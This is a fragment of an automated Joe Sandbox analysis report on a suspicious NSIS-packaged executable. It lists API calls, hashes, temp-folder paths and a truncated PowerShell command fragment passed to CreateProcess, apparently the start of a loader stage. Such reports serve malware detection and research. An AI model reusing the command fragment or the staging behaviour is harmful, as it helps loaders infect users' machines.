                                • Opcode ID: 308fadea3a0b968ed56b92214e6bc0f27c5543f8f515069d12591bb602a569a4
                                • Instruction ID: 935e679f1c1c714b0e3911a5d698b339edd04cd04073ee9c7d5fe0644536c501
                                • Opcode Fuzzy Hash: 308fadea3a0b968ed56b92214e6bc0f27c5543f8f515069d12591bb602a569a4
                                • Instruction Fuzzy Hash: FCF02831105E511AE62233352C0DAAF1A44CE93364719857FF855B12D2DB3C89479D7D
                                APIs
                                • GetTickCount.KERNEL32 ref: 00405E63
                                • GetTempFileNameA.KERNELBASE(0000000C,?,00000000,?,?,004033D6,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036B5,?,00000008), ref: 00405E7D
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1446968029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1446950244.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1446982334.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1446996476.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1446996476.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1446996476.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1446996476.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1446996476.0000000000441000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1447089030.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_MPkM9Dd99B.jbxd
                                Similarity
                                • API ID: CountFileNameTempTick
                                • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                • API String ID: 1716503409-1331003597
                                • Opcode ID: 785ee4e59b25deabe338fa9c65985dff7b7c4930a860df7800de2eab11a71ed7
                                • Instruction ID: 3970c65dfeb72379d163dc795dbdbe3f0392b49dfad0d6f3c406a96719355742
                                • Opcode Fuzzy Hash: 785ee4e59b25deabe338fa9c65985dff7b7c4930a860df7800de2eab11a71ed7
                                • Instruction Fuzzy Hash: A0F082363042046BDB109F56EC04B9B7B9CEF91750F10803BF9889B180D6B099558798
                                APIs
                                  • Part of subcall function 00405CB8: CharNextA.USER32(?,?,C:\,0000000C,00405D24,C:\,C:\,75573410,?,C:\Users\user\AppData\Local\Temp\,00405A6F,?,75573410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\MPkM9Dd99B.exe"), ref: 00405CC6
                                  • Part of subcall function 00405CB8: CharNextA.USER32(00000000), ref: 00405CCB
                                  • Part of subcall function 00405CB8: CharNextA.USER32(00000000), ref: 00405CDF
                                • GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 00401632
                                  • Part of subcall function 00405897: CreateDirectoryA.KERNELBASE(?,?), ref: 004058D9
                                • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp\Gutturotetany\dearth\Forsmgtede,00000000,00000000,000000F0), ref: 00401661
                                Strings
                                • C:\Users\user\AppData\Local\Temp\Gutturotetany\dearth\Forsmgtede, xrefs: 00401656
                                Memory Dump Source
                                • Source File: 00000000.00000002.1446968029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_MPkM9Dd99B.jbxd
                                Similarity
                                • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                • String ID: C:\Users\user\AppData\Local\Temp\Gutturotetany\dearth\Forsmgtede
                                • API String ID: 1892508949-3557324615
                                • Opcode ID: 2c20d4c644fd78e3d1f4ce17685fc2594679ef97166e32e1fcd970dca5652f26
                                • Instruction ID: 0b6d2b43488905cbaa276f6c0cac56371e043703d2fe031d841b632f48d4a949
                                • Opcode Fuzzy Hash: 2c20d4c644fd78e3d1f4ce17685fc2594679ef97166e32e1fcd970dca5652f26
                                • Instruction Fuzzy Hash: 3911E331904240AFDF307F754D41A7F26B0DA56724B68497FF891B22E2C63D49439A6E
                                APIs
                                • RegQueryValueExA.KERNELBASE(?,?,00000000,?,?,00000400,Remove folder: ,?,?,?,?,00000000,?,?,00406432,80000002), ref: 004061BA
                                • RegCloseKey.KERNELBASE(?,?,00406432,80000002,Software\Microsoft\Windows\CurrentVersion,?,Remove folder: ,?,?,Remove folder: C:\Users\user\AppData\Local\Temp\nsz930C.tmp\), ref: 004061C5
                                Memory Dump Source
                                • Source File: 00000000.00000002.1446968029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_MPkM9Dd99B.jbxd
                                Similarity
                                • API ID: CloseQueryValue
                                • String ID: Remove folder:
                                • API String ID: 3356406503-1958208860
                                • Opcode ID: 2abccbe21afdcf7b2969046f12d50590a05fc3777738c5024e31ebbb51756706
                                • Instruction ID: 11b83480b68dea0a629fd90b3ddfe96452127a043c469d5d543a73811e09722f
                                • Opcode Fuzzy Hash: 2abccbe21afdcf7b2969046f12d50590a05fc3777738c5024e31ebbb51756706
                                • Instruction Fuzzy Hash: 9A01D472500209ABCF22CF10CD05FDB3FA8EF54354F01403AF915A6191D774CA64CB94
                                APIs
                                • RegEnumKeyA.ADVAPI32(00000000,00000000,?,000003FF), ref: 004025E7
                                • RegEnumValueA.ADVAPI32(00000000,00000000,?,?), ref: 004025FA
                                • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsz930C.tmp,00000000,00000011,00000002), ref: 00402612
                                Memory Dump Source
                                • Source File: 00000000.00000002.1446968029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_MPkM9Dd99B.jbxd
                                Similarity
                                • API ID: Enum$CloseValue
                                • String ID:
                                • API String ID: 397863658-0
                                • Opcode ID: 4c7cffd82a1a6ff72a98075f8b8725b621981bbded826c54beb525449930f380
                                • Instruction ID: cba12c4e2b45f70554d055d57f05f50eb42167a32c5ceb359e12f1818167ad50
                                • Opcode Fuzzy Hash: 4c7cffd82a1a6ff72a98075f8b8725b621981bbded826c54beb525449930f380
                                • Instruction Fuzzy Hash: 4E01BC71604204AFEB218F54DE98ABF7AACEB40348F10443FF005A61C0DAB84A459A29
                                APIs
                                  • Part of subcall function 00405DFB: GetFileAttributesA.KERNELBASE(?,?,00405A13,?,?,00000000,00405BF6,?,?,?,?), ref: 00405E00
                                  • Part of subcall function 00405DFB: SetFileAttributesA.KERNELBASE(?,00000000), ref: 00405E14
                                • RemoveDirectoryA.KERNELBASE(?,?,?,00000000,00405BF6), ref: 00405A22
                                • DeleteFileA.KERNELBASE(?,?,?,00000000,00405BF6), ref: 00405A2A
                                • SetFileAttributesA.KERNEL32(?,00000000), ref: 00405A42
                                Memory Dump Source
                                • Source File: 00000000.00000002.1446968029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_MPkM9Dd99B.jbxd
                                Similarity
                                • API ID: File$Attributes$DeleteDirectoryRemove
                                • String ID:
                                • API String ID: 1655745494-0
                                • Opcode ID: 043921b8c917d9d62ea668da32ed729a983a4b9cb196bdfb72cf9d57704c1844
                                • Instruction ID: 6cbbeebccd270b92d1032a3138f2130d4a861fe222b861409a1048e863718438
                                • Opcode Fuzzy Hash: 043921b8c917d9d62ea668da32ed729a983a4b9cb196bdfb72cf9d57704c1844
                                • Instruction Fuzzy Hash: 7FE0E531314A915BC3105774AA8CA5B2A98DFC2315F050A3AF4A2B10C0CB78444A8F6D
                                APIs
                                • RegQueryValueExA.ADVAPI32(00000000,00000000,?,?,?,?), ref: 00402573
                                • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsz930C.tmp,00000000,00000011,00000002), ref: 00402612
                                Memory Dump Source
                                • Source File: 00000000.00000002.1446968029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_MPkM9Dd99B.jbxd
                                Similarity
                                • API ID: CloseQueryValue
                                • String ID:
                                • API String ID: 3356406503-0
                                • Opcode ID: dcdcdbe78ff3a909b69e1bc964059ef71c3d22f6032091b40b69186da43a403e
                                • Instruction ID: 97fa2cc47e124225833d1b044c3f4c0ff185fe65e0aec06a9837656ed07e9740
                                • Opcode Fuzzy Hash: dcdcdbe78ff3a909b69e1bc964059ef71c3d22f6032091b40b69186da43a403e
                                • Instruction Fuzzy Hash: 6511C171905205EFDF20CF60CA985AE7AB4EF01344F20883FE446B72C0D6B88A45DA1A
                                APIs
                                • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
                                Memory Dump Source
                                • Source File: 00000000.00000002.1446968029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_MPkM9Dd99B.jbxd
                                Similarity
                                • API ID: MessageSend
                                • String ID:
                                • API String ID: 3850602802-0
                                • Opcode ID: a4ad1f289275d07b12332ff40cf82794c587183748ad10ec12a076e6d131a720
                                • Instruction ID: 80ce8cba2e1b90c3c9584b4bf9ae45de9eb83361fcac52349235150bfd3c5ac5
                                • Opcode Fuzzy Hash: a4ad1f289275d07b12332ff40cf82794c587183748ad10ec12a076e6d131a720
                                • Instruction Fuzzy Hash: C801F4317242209BE7295B399D08B6A36D8E710754F50823FF995F71F1E678CC028B5C
                                APIs
                                • CreateDirectoryA.KERNELBASE(?,?), ref: 004058D9
                                • GetLastError.KERNEL32 ref: 004058E7
                                Memory Dump Source
                                • Source File: 00000000.00000002.1446968029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_MPkM9Dd99B.jbxd
                                Similarity
                                • API ID: CreateDirectoryErrorLast
                                • String ID:
                                • API String ID: 1375471231-0
                                • Opcode ID: 3953c50c5734a5342b3d9bd696b660d903f899823d07f085df3ad9df62cd1170
                                • Instruction ID: 6d4ac730157cfa02be50de44a6d7979ff339f577f95dd1204a0ac4d64297c34f
                                • Opcode Fuzzy Hash: 3953c50c5734a5342b3d9bd696b660d903f899823d07f085df3ad9df62cd1170
                                • Instruction Fuzzy Hash: A3F0F971C0024DDADB00DFA4D5487DEBBB4AF04305F00802AD841B6280D7B882588B99
                                APIs
                                • ShowWindow.USER32(00000000,00000000), ref: 00401F08
                                • EnableWindow.USER32(00000000,00000000), ref: 00401F13
                                Memory Dump Source
                                • Source File: 00000000.00000002.1446968029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_MPkM9Dd99B.jbxd
                                Similarity
                                • API ID: Window$EnableShow
                                • String ID:
                                • API String ID: 1136574915-0
                                • Opcode ID: c55ef19b1d155cac422469f2929527eb9f7a60a7667ba4af7f0f003dd8d3c6d7
                                • Instruction ID: ee44cb40e53ee45f72a0237e1ac7dd9bbdf9d48109a1395b289766a98c9c438f
                                • Opcode Fuzzy Hash: c55ef19b1d155cac422469f2929527eb9f7a60a7667ba4af7f0f003dd8d3c6d7
                                • Instruction Fuzzy Hash: C9E04872A082049FEF64EBA4FE9556F77F4EB50365B20447FE101F11C2DA7849428A5D
                                APIs
                                • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0042BC90,?,"$Beseen=gc -raw ',"$Beseen=gc -raw ',?,Bje gka",00000000), ref: 0040594F
                                • CloseHandle.KERNEL32(?), ref: 0040595C
                                Memory Dump Source
                                • Source File: 00000000.00000002.1446968029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_MPkM9Dd99B.jbxd
                                Similarity
                                • API ID: CloseCreateHandleProcess
                                • String ID:
                                • API String ID: 3712363035-0
                                • Opcode ID: f2e48875b6aa7a4f82b92d961b6a232b94f4984d6ef5c684ccb1095c4447d295
                                • Instruction ID: 59d3833cbd0ccaca5dcead9257bf18f7f56651039fadea8639d530792baa2c48
                                • Opcode Fuzzy Hash: f2e48875b6aa7a4f82b92d961b6a232b94f4984d6ef5c684ccb1095c4447d295
                                • Instruction Fuzzy Hash: 4DE09AB4A00209BFFB109F65AD09F7B776CE704714F418425B914F2151EB7498148A7C
                                APIs
                                • ShowWindow.USER32(00010448), ref: 004015A6
                                • ShowWindow.USER32(00010442), ref: 004015BB
                                Memory Dump Source
                                • Source File: 00000000.00000002.1446968029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_MPkM9Dd99B.jbxd
                                Similarity
                                • API ID: ShowWindow
                                • String ID:
                                • API String ID: 1268545403-0
                                • Opcode ID: 43fc7ab4d8aab13bbe0e3b58b10b50637c22b5aa756d30fe598e07b3bf5632ed
                                • Instruction ID: 6682d38faa1af99df36a0191d691bb63ef923b98cac77dddb2e5d8f8093f9b88
                                • Opcode Fuzzy Hash: 43fc7ab4d8aab13bbe0e3b58b10b50637c22b5aa756d30fe598e07b3bf5632ed
                                • Instruction Fuzzy Hash: 5AE04F727001109FCF64DB94EEA086E73E6E794310360043FD102B3290C6749C068A68
                                APIs
                                • GetModuleHandleA.KERNEL32(?,00000000,?,0040351A,0000000C), ref: 004066C7
                                • GetProcAddress.KERNEL32(00000000,?), ref: 004066E2
                                  • Part of subcall function 00406647: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0040665E
                                  • Part of subcall function 00406647: wsprintfA.USER32 ref: 00406697
                                  • Part of subcall function 00406647: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004066AB
                                Memory Dump Source
                                • Source File: 00000000.00000002.1446968029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_MPkM9Dd99B.jbxd
                                Similarity
                                • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                • String ID:
                                • API String ID: 2547128583-0
                                • Opcode ID: 6364b50fcd8a78884de1a109c3061c8e2e734accc18c0610f9b5885e266cf418
                                • Instruction ID: a472cff2ba870c31c69f4352ad77424fb7bed112d4ffd52c95bf20a34481097e
                                • Opcode Fuzzy Hash: 6364b50fcd8a78884de1a109c3061c8e2e734accc18c0610f9b5885e266cf418
                                • Instruction Fuzzy Hash: BAE08C73A04210ABD610A6709E0883B73ACAF897413030C3EF952F2240DB3ADC32966E
                                APIs
                                • GetFileAttributesA.KERNELBASE(00000003,00402F71,C:\Users\user\Desktop\MPkM9Dd99B.exe,80000000,00000003,?,?,00403722,?,?,00000008,0000000A,0000000C), ref: 00405E24
                                • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,00403722,?,?,00000008,0000000A,0000000C), ref: 00405E46
                                Memory Dump Source
                                • Source File: 00000000.00000002.1446968029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_MPkM9Dd99B.jbxd
                                Similarity
                                • API ID: File$AttributesCreate
                                • String ID:
                                • API String ID: 415043291-0
                                • Opcode ID: 4c035aff046b4d43788645f88f630755698ea216f1f6cd5eefec511dda558379
                                • Instruction ID: 0febe3887fb1e567d40345103610fd6f3e8d71b3c6328ccb34cdb50f288ecb70
                                • Opcode Fuzzy Hash: 4c035aff046b4d43788645f88f630755698ea216f1f6cd5eefec511dda558379
                                • Instruction Fuzzy Hash: 23D09E31254301AFEF099F20DE16F2E7AA2EB84B00F11952CB682A41E0DA7158299B15
                                APIs
                                • GetFileAttributesA.KERNELBASE(?,?,00405A13,?,?,00000000,00405BF6,?,?,?,?), ref: 00405E00
                                • SetFileAttributesA.KERNELBASE(?,00000000), ref: 00405E14
                                Memory Dump Source
                                • Source File: 00000000.00000002.1446968029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_MPkM9Dd99B.jbxd
                                Similarity
                                • API ID: AttributesFile
                                • String ID:
                                • API String ID: 3188754299-0
                                • Opcode ID: 96c7ec262ab61fe6fea47152b5241fdb13327e4bfef36903235a76d16f55e530
                                • Instruction ID: f779a6514c6a4e708396d8c5aab00734bb1243d63453d3b06c62658839fa2b1d
                                • Opcode Fuzzy Hash: 96c7ec262ab61fe6fea47152b5241fdb13327e4bfef36903235a76d16f55e530
                                • Instruction Fuzzy Hash: 20D0C9725056206BC2103B28EE0889BBB55DB542717028B35F9A9A22B0CB304C668B98
                                APIs
                                • CloseHandle.KERNEL32(FFFFFFFF,004037BF,?,?,00000008,0000000A,0000000C), ref: 004039C7
                                Strings
                                • C:\Users\user\AppData\Local\Temp\nsz930C.tmp\, xrefs: 004039DB
                                Memory Dump Source
                                • Source File: 00000000.00000002.1446968029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1446950244.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1446982334.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1446996476.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1446996476.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1446996476.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1446996476.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1446996476.0000000000441000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1447089030.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_MPkM9Dd99B.jbxd
                                Similarity
                                • API ID: CloseHandle
                                • String ID: C:\Users\user\AppData\Local\Temp\nsz930C.tmp\
                                • API String ID: 2962429428-3178380450
                                • Opcode ID: 690aa45f0be1a931a0176c4e0d9fa5981e6643ccd20a8d7c7662d168512a01e4
                                • Instruction ID: afeb4de79f0a024d8aad6c8bb86ec84bc3369b341d6032a4bf43371fdf378432
                                • Opcode Fuzzy Hash: 690aa45f0be1a931a0176c4e0d9fa5981e6643ccd20a8d7c7662d168512a01e4
                                • Instruction Fuzzy Hash: B1C0223020030066C0206F788E8F5483A045740339BA18336F0B8F04F1CB3C068C0D5D
                                APIs
                                • CreateDirectoryA.KERNELBASE(?,00000000,004033CB,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036B5,?,00000008,0000000A,0000000C), ref: 004058F7
                                • GetLastError.KERNEL32(?,00000008,0000000A,0000000C), ref: 00405905
                                Memory Dump Source
                                • Source File: 00000000.00000002.1446968029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1446950244.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1446982334.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1446996476.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1446996476.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1446996476.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1446996476.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1446996476.0000000000441000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1447089030.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_MPkM9Dd99B.jbxd
                                Similarity
                                • API ID: CreateDirectoryErrorLast
                                • String ID:
                                • API String ID: 1375471231-0
                                • Opcode ID: 7ce514c051633c67dabed91c1ba2c830ad6f4192d7236d4c27a26ed09d9cb01d
                                • Instruction ID: 226d66ac6a6a747d722d053d5b09978fff7ae735be90135577c6d3bd4ef0b281
                                • Opcode Fuzzy Hash: 7ce514c051633c67dabed91c1ba2c830ad6f4192d7236d4c27a26ed09d9cb01d
                                • Instruction Fuzzy Hash: F9C04CB120490ADED6505B319F0971B7A51AB50751F175839A586E40A0DB348455DD2E
                                APIs
                                • MoveFileA.KERNEL32(00000000,00000000), ref: 004016AA
                                Memory Dump Source
                                • Source File: 00000000.00000002.1446968029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1446950244.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1446982334.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1446996476.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1446996476.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1446996476.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1446996476.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1446996476.0000000000441000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1447089030.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_MPkM9Dd99B.jbxd
                                Similarity
                                • API ID: FileMove
                                • String ID:
                                • API String ID: 3562171763-0
                                • Opcode ID: 01db277db8653d624179d7b600e08ca7f67f5e45fdde97e81b8b39cbf95d4e5b
                                • Instruction ID: 67493920040547a329b99de5d89bb6d269ebd8b6645208cc7e8d7a7b283b3978
                                • Opcode Fuzzy Hash: 01db277db8653d624179d7b600e08ca7f67f5e45fdde97e81b8b39cbf95d4e5b
                                • Instruction Fuzzy Hash: 09F0B431608125A7DF20BB765F5DE5F52A49B41378B20423BF212B21D1DABDC643856E
                                APIs
                                • WritePrivateProfileStringA.KERNEL32(00000000,00000000,?,00000000), ref: 00402402
                                Memory Dump Source
                                • Source File: 00000000.00000002.1446968029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1446950244.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1446982334.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1446996476.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1446996476.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1446996476.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1446996476.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1446996476.0000000000441000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1447089030.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_MPkM9Dd99B.jbxd
                                Similarity
                                • API ID: PrivateProfileStringWrite
                                • String ID:
                                • API String ID: 390214022-0
                                • Opcode ID: 3326b8378841c5f3540bed9b182ec42c057636b7d1278427695ffb5e145c9da6
                                • Instruction ID: f24de8215b53ecbcf80a61348f6bfc7870897c54b3e6c90e9d08f7162164e460
                                • Opcode Fuzzy Hash: 3326b8378841c5f3540bed9b182ec42c057636b7d1278427695ffb5e145c9da6
                                • Instruction Fuzzy Hash: 9DE04F3160413A6BEB6036B11F8D97F2159AB84314B14053EBA11B62C6D9FC8E8352A9
                                APIs
                                • RegCreateKeyExA.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402D0F,00000000,?,?), ref: 0040616A
                                Memory Dump Source
                                • Source File: 00000000.00000002.1446968029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1446950244.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1446982334.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1446996476.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1446996476.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1446996476.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1446996476.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1446996476.0000000000441000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1447089030.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_MPkM9Dd99B.jbxd
                                Similarity
                                • API ID: Create
                                • String ID:
                                • API String ID: 2289755597-0
                                • Opcode ID: b17b4e85cc10dff7c00d1995fa2300a068af545831f113dbcef6cd8b4d780b07
                                • Instruction ID: bbdc12591f07ec5b960d4a172b59ed2570ed34ba37628b65f55bcc9503456b15
                                • Opcode Fuzzy Hash: b17b4e85cc10dff7c00d1995fa2300a068af545831f113dbcef6cd8b4d780b07
                                • Instruction Fuzzy Hash: 7AE0E6B2020109BEEF099F60DC1AD7B772DE708310F01492EFA06D4151E6B5E9705634
                                APIs
                                • SearchPathA.KERNELBASE(?,00000000,?,00000400,?,?,000000FF), ref: 00401758
                                Memory Dump Source
                                • Source File: 00000000.00000002.1446968029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1446950244.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1446982334.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1446996476.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1446996476.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1446996476.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1446996476.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1446996476.0000000000441000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1447089030.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_MPkM9Dd99B.jbxd
                                Similarity
                                • API ID: PathSearch
                                • String ID:
                                • API String ID: 2203818243-0
                                • Opcode ID: 4205dc15fe547f27f479e1deebd95f86bdda3a1c9deaf9bd02e28dbd9a4af209
                                • Instruction ID: 05024ed45ffdbec093a2934bfd596ec6e4c724010b47aa93efab37ffede3367c
                                • Opcode Fuzzy Hash: 4205dc15fe547f27f479e1deebd95f86bdda3a1c9deaf9bd02e28dbd9a4af209
                                • Instruction Fuzzy Hash: A5E0D871304100EFEB10CB649D48AAB3798DB10368B30453AE501A20C2D5B58946872C
                                APIs
                                • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,00403343,00000000,0041D440,000000FF,0041D440,000000FF,000000FF,00000004,00000000), ref: 00405EDB
                                Memory Dump Source
                                • Source File: 00000000.00000002.1446968029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1446950244.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1446982334.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1446996476.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1446996476.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1446996476.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1446996476.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1446996476.0000000000441000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1447089030.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_MPkM9Dd99B.jbxd
                                Similarity
                                • API ID: FileWrite
                                • String ID:
                                • API String ID: 3934441357-0
                                • Opcode ID: 11d7c7005d0d3054af3b9be2f3a82004ed33d4240877e49ff836af06555e7eff
